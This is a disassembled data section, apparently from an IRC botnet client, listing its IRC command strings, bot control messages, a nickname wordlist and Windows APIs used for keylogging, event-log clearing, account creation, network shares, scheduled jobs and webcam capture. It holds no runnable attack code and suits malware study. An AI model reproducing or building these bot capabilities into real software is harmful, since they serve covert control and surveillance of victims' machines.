db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aServerChangedT db 'Server changed to: ',27h,'%s',27h,'.',0
align 4
aOpen_1 db 'open',0 ; DATA XREF: sub_401C87+7A6D�o
align 10h
unk_443370 db 2Dh ; - ; DATA XREF: sub_401C87+7A80�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFileOpenedS db ' File opened: %s',0
align 10h
unk_443390 db 2Dh ; - ; DATA XREF: sub_401C87:loc_409711�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s',0
unk_4433B4 db 2Dh ; - ; DATA XREF: sub_401C87+7AA3�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrefixChangedT db 'Prefix changed to: ',27h,'%c',27h,'.',0
align 4
aNickS_7 db 'NICK %s',0 ; DATA XREF: sub_401C87+7AE9�o
aS_25 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7AFE�o
align 4
aQuitLater_0 db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7B2C�o
align 4
aAll db 'all',0 ; DATA XREF: sub_401C87+7BB9�o
unk_443400 db 2Dh ; - ; DATA XREF: sub_401C87+7BD3�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aStoppedDThread db '- Stopped: %d thread(s).',0
align 4
unk_443428 db 2Dh ; - ; DATA XREF: sub_401C87:loc_409864�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aNoActiveThread db '- No active threads found.',0
unk_443450 db 2Dh ; - ; DATA XREF: sub_401C87+7C28�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aKilledThreadS_ db '- Killed thread: %s.',0
align 4
unk_443474 db 2Dh ; - ; DATA XREF: sub_401C87:loc_4098B6�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToKillTh db '- Failed to kill thread: %s.',0
align 10h
aS_26 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7C97�o
align 4
dword_4434A8 dd 234032Dh, 6E69616Dh, 202D0302h, 20435249h, 3A776152h
; DATA XREF: sub_401C87+7CA5�o
dd 2E732520h, 0
dword_4434C4 dd 54524150h, 0D732520h, 0Ah ; DATA XREF: sub_401C87+7CB2�o
unk_4434D0 db 2Dh ; - ; DATA XREF: sub_401C87+7CC2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPartedChannelS db 'Parted channel: ',27h,'%s',27h,'.',0
align 4
aJoinSS_3 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7CD6�o
align 4
unk_443504 db 2Dh ; - ; DATA XREF: sub_401C87+7CE6�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChanne_0 db 'Joined channel: ',27h,'%s',27h,'.',0
align 4
aNickS_8 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7CF3�o
align 4
unk_443534 db 2Dh ; - ; DATA XREF: sub_401C87+7D03�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNickChangedToS db 'Nick changed to: ',27h,'%s',27h,'.',0
align 4
aQuitReconnec_0 db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401C87:loc_409994�o
align 10h
unk_443570 db 2Dh ; - ; DATA XREF: sub_401C87+7D23�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnectingIn db 'Reconnecting in %s ms',0
align 4
aQuitReconnec_1 db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401C87:loc_4099DA�o
align 4
unk_4435AC db 2Dh ; - ; DATA XREF: sub_401C87+7D69�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnecting_0 db 'Reconnecting in %s seconds',0
align 4
aNickS_9 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7DBF�o
align 10h
unk_4435E0 db 2Dh ; - ; DATA XREF: sub_401C87+7DD3�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRandomNickChan db 'Random nick change: %s',0
align 4
asc_443604: ; DATA XREF: sub_401C87+7E06�o
; sub_401C87+7E24�o
unicode 0, <!~>
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401C87+7E54�o
align 10h
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_401C87+7E68�o
align 4
unk_44365C db 2Dh ; - ; DATA XREF: sub_401C87+7E77�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedPassAuth db '*Failed pass auth by: (%s!%s).',0
align 4
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401C87+7EC1�o
align 10h
aNoticeSYourA_0 db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_401C87+7ED5�o
align 4
unk_4436DC db 2Dh ; - ; DATA XREF: sub_401C87+7EE4�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedHostAuth db '*Failed host auth by: (%s!%s).',0
align 4
unk_443708 db 2Dh ; - ; DATA XREF: sub_401C87+7F39�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPasswordAccept db 'Password accepted.',0
align 4
unk_443728 db 2Dh ; - ; DATA XREF: sub_401C87+7F56�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedIn_ db 'User: %s logged in.',0
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7F63�o
align 4
aModeSS_0 db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7F78�o
align 4
aJoinSS_4 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7F8B�o
align 4
aNotice_3 db 'NOTICE',0 ; DATA XREF: sub_409C75+F�o
align 10h
aPrivmsg_2 db 'PRIVMSG',0 ; DATA XREF: sub_409C75+16�o
aS_12 db '%s',0 ; DATA XREF: sub_409C75+3B�o
align 4
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409C75+58�o
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_409D10+A�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_409D10+23�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_409D10+2B�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_409D10+38�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_409D10+45�o
align 4
aModule32first db 'Module32First',0 ; DATA XREF: sub_409D10+52�o
align 4
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_409D10+5F�o
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_409D10+6C�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_409D10+79�o
align 10h
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_409D10+86�o
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_409D10+93�o
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_409D10+A0�o
align 10h
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_409D10:loc_409E18�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_409D10:loc_409E45�o
align 4
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_409D10+14A�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_409D10+152�o
aIswindow db 'IsWindow',0 ; DATA XREF: sub_409D10+15F�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_409D10+16C�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_409D10+179�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_409D10+186�o
align 10h
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_409D10+193�o
align 10h
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_409D10+1A0�o
align 10h
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_409D10:loc_409F08�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_409D10+200�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_409D10+20D�o
align 10h
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_409D10+21A�o
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_409D10:loc_409F6F�o
align 4
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_409D10+270�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_409D10+278�o
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_409D10+285�o
align 4
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_409D10+292�o
align 4
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_409D10+29F�o
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_409D10+2AC�o
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_409D10+2B9�o
align 4
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_409D10+2C6�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_409D10:loc_40A022�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_409D10+31A�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_409D10+327�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_409D10:loc_40A067�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_409D10+35F�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_409D10+36C�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_409D10+379�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_409D10+386�o
align 4
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_409D10+393�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_409D10+3A0�o
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_409D10+3AD�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_409D10:loc_40A115�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_409D10:loc_40A13D�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_409D10+43E�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_409D10+446�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_409D10+453�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_409D10+460�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_409D10+46D�o
align 10h
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_409D10+47A�o
align 10h
aBitblt db 'BitBlt',0 ; DATA XREF: sub_409D10+487�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_409D10+494�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_409D10+4A1�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_409D10+514�o
align 10h
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_409D10+525�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_409D10+52D�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_409D10+53A�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_409D10+547�o
align 4
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_409D10+554�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_409D10+561�o
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_409D10+56E�o
align 10h
aSocket db 'socket',0 ; DATA XREF: sub_409D10+57B�o
align 4
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_409D10+588�o
aConnect db 'connect',0 ; DATA XREF: sub_409D10+595�o
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_409D10+5A2�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_409D10+5AF�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_409D10+5BC�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_409D10+5C9�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_409D10+5D6�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_409D10+5E3�o
align 4
aSend_0 db 'send',0 ; DATA XREF: sub_409D10+5F0�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_409D10+5FD�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_409D10+60A�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_409D10+617�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_409D10+629�o
align 10h
aSelect db 'select',0 ; DATA XREF: sub_409D10+631�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_409D10+63E�o
align 10h
aAccept db 'accept',0 ; DATA XREF: sub_409D10+64B�o
align 4
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_409D10+658�o
align 4
aGetsockname db 'getsockname',0 ; DATA XREF: sub_409D10+665�o
aGethostname db 'gethostname',0 ; DATA XREF: sub_409D10+672�o
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_409D10+67F�o
align 4
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_409D10+68C�o
align 4
aGetpeername db 'getpeername',0 ; DATA XREF: sub_409D10+699�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_409D10+6A6�o
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_409D10:loc_40A4EF�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_409D10+7F0�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_409D10+7F8�o
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_409D10+805�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_409D10+812�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_409D10+81F�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_409D10+82C�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_409D10+839�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_409D10+846�o
align 4
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_409D10+853�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_409D10+860�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_409D10+8D2�o
align 10h
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_409D10:loc_40A60F�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409D10+90C�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409D10+914�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409D10+921�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409D10:loc_40A66E�o
align 4
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_409D10+96F�o
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_409D10+977�o
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_409D10+984�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_409D10+991�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_409D10+99E�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_409D10+9AB�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_409D10+9B8�o
align 4
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_409D10+9C5�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_409D10+9D2�o
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_409D10+9DF�o
align 10h
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_409D10+9EC�o
align 4
aNetwkstagetinf db 'NetWkstaGetInfo',0 ; DATA XREF: sub_409D10+9F9�o
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_409D10:loc_40A78A�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_409D10+A87�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_409D10+A8F�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_409D10:loc_40A7D4�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_409D10+AD1�o
align 4
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_409D10+AD9�o
align 10h
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_409D10:loc_40A81E�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_409D10+B1B�o
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_409D10+B23�o
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_409D10+B30�o
align 4
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_409D10+B3D�o
align 10h
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_409D10:loc_40A892�o
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_409D10+B8F�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_409D10+B97�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_409D10:loc_40A8DC�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_409D10+BD9�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_409D10+BE1�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_409D10+BEE�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_409D10+BFB�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_409D10+C08�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_409D10+C15�o
align 4
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_409D10:loc_40A97A�o
; _7:off_510BE8�o
align 4
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_409D10+C77�o
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_409D10+C7F�o
align 10h
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+28�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+5C�o
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+90�o
align 10h
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+C4�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+F8�o
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+12C�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+160�o
align 4
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+194�o
align 10h
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+1C8�o
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+1FC�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+230�o
align 4
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+264�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+298�o
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40A9CC+2CC�o
align 4
unk_4441FC db 2Dh ; - ; DATA XREF: sub_40A9CC+2F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aDllTestComplet db 'DLL test complete.',0
align 4
a___1: ; DATA XREF: _0:0040AD2C�o _0:0040AD44�o
unicode 0, <..>
unk_444220 db 2Dh ; - ; DATA XREF: sub_40ADC9+43�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGettingAr db 'error getting ARP cache: %d',0
unk_44424C db 2Dh ; - ; DATA XREF: sub_40ADC9:loc_40AE22�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheIsEmpt db 'ARP cache is empty',0
align 10h
unk_444270 db 2Dh ; - ; DATA XREF: sub_40ADC9+8C�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGetting_0 db 'error getting ARP cache: %d',0
unk_44429C db 2Dh ; - ; DATA XREF: sub_40ADC9:loc_40AE5C�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aUnableToAlloca db 'unable to allocate ARP cache',0
align 4
unk_4442CC db 2Dh ; - ; DATA XREF: sub_40ADC9:loc_40AE8E�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aNotSupportedBy db 'not supported by this system',0
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40AEAD+46�o
aReal db 'real',0 ; DATA XREF: sub_40B38F+F�r
align 10h
dd 0
dword_444314 dd 0 ; DATA XREF: sub_40B38F:loc_40B3B6�r
off_444318 dd offset sub_40AFAB ; DATA XREF: sub_40B38F+4A�r
aConst db 'const',0
align 8
dd 1, 40B017h, 7474656Ch, 7265h, 0
dd 2, 40B075h, 706D6F63h, 2 dup(0)
dd 3, 40B0C2h, 6E756F63h, 797274h, 0
dd 4, 40B168h, 736Fh, 2 dup(0)
dd 5, 40B1DDh
aAbdulrazak db 'Abdulrazak',0 ; DATA XREF: _2:off_446DB0�o
align 4
aAckerman db 'Ackerman',0 ; DATA XREF: _2:00446DB4�o
align 4
aAdams db 'Adams',0 ; DATA XREF: _2:00446DB8�o
align 10h
aAddison db 'Addison',0 ; DATA XREF: _2:00446DBC�o
aAdelstein db 'Adelstein',0 ; DATA XREF: _2:00446DC0�o
align 4
aAdibe db 'Adibe',0 ; DATA XREF: _2:00446DC4�o
align 4
aAdorno db 'Adorno',0 ; DATA XREF: _2:00446DC8�o
align 4
aAhlers db 'Ahlers',0 ; DATA XREF: _2:00446DCC�o
align 4
aAlavi db 'Alavi',0 ; DATA XREF: _2:00446DD0�o
align 4
aAlcorn db 'Alcorn',0 ; DATA XREF: _2:00446DD4�o
align 4
aAlda db 'Alda',0 ; DATA XREF: _2:00446DD8�o
align 4
aAleks db 'Aleks',0 ; DATA XREF: _2:00446DDC�o
align 4
aAllison db 'Allison',0 ; DATA XREF: _2:00446DE0�o
aAlongi db 'Alongi',0 ; DATA XREF: _2:00446DE4�o
align 4
aAltavilla db 'Altavilla',0 ; DATA XREF: _2:00446DE8�o
align 4
aAltenberger db 'Altenberger',0 ; DATA XREF: _2:00446DEC�o
aAltenhofen db 'Altenhofen',0 ; DATA XREF: _2:00446DF0�o
align 10h
aAmaral db 'Amaral',0 ; DATA XREF: _2:00446DF4�o
align 4
aAmatangelo db 'Amatangelo',0 ; DATA XREF: _2:00446DF8�o
align 4
aAmeer db 'Ameer',0 ; DATA XREF: _2:00446DFC�o
align 4
aAmsden db 'Amsden',0 ; DATA XREF: _2:00446E00�o
align 4
aAnand db 'Anand',0 ; DATA XREF: _2:00446E04�o
align 4
aAndel db 'Andel',0 ; DATA XREF: _2:00446E08�o
align 4
aAndo db 'Ando',0 ; DATA XREF: _2:00446E0C�o
align 4
aAndrelus db 'Andrelus',0 ; DATA XREF: _2:00446E10�o
align 4
aAndron db 'Andron',0 ; DATA XREF: _2:00446E14�o
align 10h
aAnfinrud db 'Anfinrud',0 ; DATA XREF: _2:00446E18�o
align 4
aAnsley db 'Ansley',0 ; DATA XREF: _2:00446E1C�o
align 4
aAnthony db 'Anthony',0 ; DATA XREF: _2:00446E20�o
aAntos db 'Antos',0 ; DATA XREF: _2:00446E24�o
align 4
aArbia db 'Arbia',0 ; DATA XREF: _2:00446E28�o
align 4
aArduini db 'Arduini',0 ; DATA XREF: _2:00446E2C�o
aArellano db 'Arellano',0 ; DATA XREF: _2:00446E30�o
align 10h
aAristotle db 'Aristotle',0 ; DATA XREF: _2:00446E34�o
align 4
aArjas db 'Arjas',0 ; DATA XREF: _2:00446E38�o
align 4
aArky db 'Arky',0 ; DATA XREF: _2:00446E3C�o
align 4
aAtkins db 'Atkins',0 ; DATA XREF: _2:00446E40�o
align 4
aAugustus db 'Augustus',0 ; DATA XREF: _2:00446E44�o
align 10h
aAurelius db 'Aurelius',0 ; DATA XREF: _2:00446E48�o
align 4
aAxelrod db 'Axelrod',0 ; DATA XREF: _2:00446E4C�o
aAxworthy db 'Axworthy',0 ; DATA XREF: _2:00446E50�o
align 10h
aAyiemba db 'Ayiemba',0 ; DATA XREF: _2:00446E54�o
aAykroyd db 'Aykroyd',0 ; DATA XREF: _2:00446E58�o
aAyling db 'Ayling',0 ; DATA XREF: _2:00446E5C�o
align 4
aAzima db 'Azima',0 ; DATA XREF: _2:00446E60�o
align 10h
aBachmuth db 'Bachmuth',0 ; DATA XREF: _2:00446E64�o
align 4
aBackus db 'Backus',0 ; DATA XREF: _2:00446E68�o
align 4
aBady db 'Bady',0 ; DATA XREF: _2:00446E6C�o
align 4
aBaglivo db 'Baglivo',0 ; DATA XREF: _2:00446E70�o
aBagnold db 'Bagnold',0 ; DATA XREF: _2:00446E74�o
aBailar db 'Bailar',0 ; DATA XREF: _2:00446E78�o
align 4
aBakanowsky db 'Bakanowsky',0 ; DATA XREF: _2:00446E7C�o
align 10h
aBaleja db 'Baleja',0 ; DATA XREF: _2:00446E80�o
align 4
aBallatori db 'Ballatori',0 ; DATA XREF: _2:00446E84�o
align 4
aBallew db 'Ballew',0 ; DATA XREF: _2:00446E88�o
align 4
aBaltz db 'Baltz',0 ; DATA XREF: _2:00446E8C�o
align 4
aBanta db 'Banta',0 ; DATA XREF: _2:00446E90�o
align 4
aBarabesi db 'Barabesi',0 ; DATA XREF: _2:00446E94�o
align 4
aBarajas db 'Barajas',0 ; DATA XREF: _2:00446E98�o
aBaranczak db 'Baranczak',0 ; DATA XREF: _2:00446E9C�o
align 4
aBaranowska db 'Baranowska',0 ; DATA XREF: _2:00446EA0�o
align 4
aBarberi db 'Barberi',0 ; DATA XREF: _2:00446EA4�o
aBarbetti db 'Barbetti',0 ; DATA XREF: _2:00446EA8�o
align 4
aBarneson db 'Barneson',0 ; DATA XREF: _2:00446EAC�o
align 4
aBarnett db 'Barnett',0 ; DATA XREF: _2:00446EB0�o
aBarriola db 'Barriola',0 ; DATA XREF: _2:00446EB4�o
align 4
aBarry db 'Barry',0 ; DATA XREF: _2:00446EB8�o
align 4
aBartholomew db 'Bartholomew',0 ; DATA XREF: _2:00446EBC�o
aBartolome db 'Bartolome',0 ; DATA XREF: _2:00446EC0�o
align 4
aBartoo db 'Bartoo',0 ; DATA XREF: _2:00446EC4�o
align 4
aBasavappa db 'Basavappa',0 ; DATA XREF: _2:00446EC8�o
align 10h
aBashevis db 'Bashevis',0 ; DATA XREF: _2:00446ECC�o
align 4
aBatchelder db 'Batchelder',0 ; DATA XREF: _2:00446ED0�o
align 4
aBaumiller db 'Baumiller',0 ; DATA XREF: _2:00446ED4�o
align 4
aBayles db 'Bayles',0 ; DATA XREF: _2:00446ED8�o
align 4
